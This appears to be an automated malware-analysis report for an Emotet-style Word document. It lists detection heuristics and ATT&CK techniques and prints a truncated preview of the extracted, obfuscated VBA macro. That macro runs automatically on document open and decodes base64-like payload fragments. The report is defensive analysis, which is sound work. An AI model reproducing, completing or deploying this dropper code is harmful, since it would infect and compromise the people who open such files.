MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, and the 'Document_Open' macro suggests automatic execution upon opening. The 'macros.bas' file contains obfuscated VBA code that likely downloads and executes a second-stage payload, as indicated by the ClamAV detection 'Doc.Malware.Emodldr-10025032-0'.
Heuristics 6
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41033 bytes |
SHA-256: 58ddd6f22ab9ce9ca2f1a0541be6e44fbc5399e03d27641e7d961d723c23b76c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 17 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZwFnNUYkX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
qFJnf = CDbl(74787)
GcBNAb = Sgn(85799)
avDZjK = fZaZz
ciFjiU = 43479
OwrJo = CStr(68150)
UiIQSa = kQprI
Application.Run akMFnT + "AuDBicrj" + tviSGW, MwMQr + UjcKEYBVwnrzMU + hLrSIj
Fwptq = CDbl(24331)
oiklVV = Sgn(11532)
YEpKwH = lDZzh
OtuwHP = 45562
Gkcudd = CStr(64391)
avWVu = mcwjvu
End Sub
Attribute VB_Name = "lUqfvZlp"
Sub OFiqRT(QTidX)
idMCbG = CDbl(35712)
XTdiUQ = Sgn(72792)
hEvZl = QmEVTO
QRQpIq = 25300
tzfWq = CStr(82384)
FIwCbB = ZhwrzM
End Sub
Function UjcKEYBVwnrzMU()
On Error Resume Next
djCGY = CDbl(54168)
hPlPW = Sgn(11823)
HmHfO = vYTTK
wJNHOV = 22338
wOnfmt = CStr(36783)
FPstKF = RTLAk
wQNDfRUOL = bcVtwV("IWK@8ADEANAA2AGMAZQA0AGYAZgAwlHmX", XmrzCl - XmrzCl + 6 + XmrzCl - XmrzCl, XmrzCl - XmrzCl + 24 + XmrzCl - XmrzCl)
EQivl = CDbl(61242)
THXtL = Sgn(30001)
twbsV = zTDaQ
rCwnDU = 52212
uzEkBN = CStr(23435)
zswivl = TsTfh
RBjsk = CDbl(32597)
NpqNF = Sgn(76558)
HwvJdP = oIWXMd
Iqvpd = 55273
piYZf = CStr(54510)
usDnzO = YwLafi
JNBToTOLlz = bcVtwV("kOBwGMAMgAzAGMAOQA1ADEAMwBlAGQAYwAzADQAYQA0ADIAOQA3ADIAZQBjAGUAOAAxAGEAYQBjADAAYwBmADMAMgBkAGQAOQAyAGUAOQA4ADEAOQAxAGYANwBjADEAMwAwADMAMQAyADAAMQA0ADgAYwAxADkAOABjADAANwBkAGMAYgBiADgAOAAyADQA%UV3", lMIiK - lMIiK + 5 + lMIiK - lMIiK, lMIiK - lMIiK + 187 + lMIiK - lMIiK)
tKUXnw = CDbl(10289)
vYbLVS = Sgn(26961)
jwmqt = SkNPk
sjOwwq = 92231
EBrfj = CStr(90933)
fLosKK = cbsnjc
GNSTj = CDbl(42917)
cJERf = Sgn(25226)
jAJZqk = LChwi
aoTqtB = 88616
qDEWBs = CStr(63352)
mWJmMB = hXSBr
WERdDnG = bcVtwV("IY27inBmADMAZQBjADYAq1", jKYMVG - jKYMVG + 7 + jKYMVG - jKYMVG, jKYMVG - jKYMVG + 14 + jKYMVG - jKYMVG)
KkXCvk = CDbl(77129)
OXiTOq = Sgn(94526)
DosiX = LmrOY
lTbzC = 78733
ThTFIs = CStr(97379)
wfTwL = cTdJM
MSDOBR = CDbl(27952)
iiUVH = Sgn(95407)
whCMb = aEiIl
SVnAUR = 48957
qsjzWM = CStr(81063)
BFFCpn = hJutal
diviU = bcVtwV("1453MDIAYwAzADUANgBjADUANQA5ADIAMgBlADAAZABhADAAMQAyAGUAMABmADMAMgAxAGMAYgA2ADQAMQBjADMAYwAwADAAOQA2AGIAOABlADEAMwAyAGMAYQA0AGQARcOt", uYkLh - uYkLh + 6 + uYkLh - uYkLh, uYkLh - uYkLh + 123 + uYkLh - uYkLh)
YFQfv = CDbl(93910)
izDiKi = Sgn(11073)
EqOaj = YDiwf
GraXwB = 54265
ahqQt = CStr(93805)
GCUiI = hEEiAB
aRGQM = CDbl(61380)
roVfqF = Sgn(87102)
YdjALU = FIOiX
SuXrUd = 34644
znaEZt = CStr(52631)
sAsClj = vclwB
WRqLjhkSm = bcVtwV("h8mADkAMwBmAGUAYwA3ADUANgA3ADIAZgA2ADIAZABkADEAo2j", zChiQ - zChiQ + 4 + zChiQ - zChiQ, zChiQ - zChiQ + 44 + zChiQ - zChiQ)
wCiIA = CDbl(47809)
woWcbu = Sgn(50944)
Jvmaza = NpUwi
cPjhQm = 99327
vvZVhh = CStr(8967)
PbqJTl = wVElio
ZqESCw = CDbl(93355)
IsssN = Sgn(59166)
ljpnk = bYHSn
owLsKJ = 31965
bkMnE = CStr(75040)
wRPNiK = FBqFU
ILjjbG = bcVtwV("zjKOABlAGEAMQBjADQAYgAwAGYANgAxADQANgAyAGIAYwAwAGUAMgA3AGQAOAAxAGMAOQBjADEAYgA0AGQAZQBkADEANwAwADUANgBjADIANwA1ADYAYwBiADcACs2L8", oBqHWZ - oBqHWZ + 4 + oBqHWZ - oBqHWZ, oBqHWZ - oBqHWZ + 120 + oBqHWZ - oBqHWZ)
zRzzO = CDbl(2875)
Zzzhj = Sgn(94262)
mATBj = pcHrFJ
ZtJCFo = 7826
JmNYC = CStr(58829)
BRhih = cEioWW
VErnb = CDbl(97731)
wDtOzH = Sgn(58467)
zpMLfA = MHcYVI
AzjSfz = 82955
qzlrOi = CStr(98693)
Ofzvn = jLlNj
sXvPwDlYvAA = bcVtwV("uwcCADIAMAA0ADcAZgA4ADIAYwA0ADkAMgA2ADEAYgA2ADkANABkAGQAMwA1AGUAMwA1ADIAYgA1ADQAMwBlADIAOAAyADkANgA5ADAAYQAwADYA'| &('coN'+'Ve'+'rtT'+'o-s'ICl", UKFuF - UKFuF + 5 + UKFuF - UKFuF, UKFuF - UKFuF + 135 + UKFuF - UKFuF)
jKDdqI = CDbl(6784)
iicfuX = Sgn(98394)
aolHN = OsVNCi
UhSPz = 84672
vHBGbD = CStr(58875)
CUBPWT = wbbipw
DGuQa = CDbl(89032)
BdRPsG = Sgn(64906)
qmaZdh = RXAuR
haZYK = 22571
JnNlZ = CStr(63512)
zTQZI = rwMSXS
hXKtH = bcVtwV("SM3iZA1AGMANwA0ADkAOAAxADkANQA3AGQAYwBlADIAMABlADUAMABiAGIANwA5ADYANABhADEANQBlADMAZAA5AGYAMgBlADgAZQBhAGQAZgBjADEAMAA4ADMAMwA0AGYAZAA5AGEAMQBjADUANAB,s", IdFYf -
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.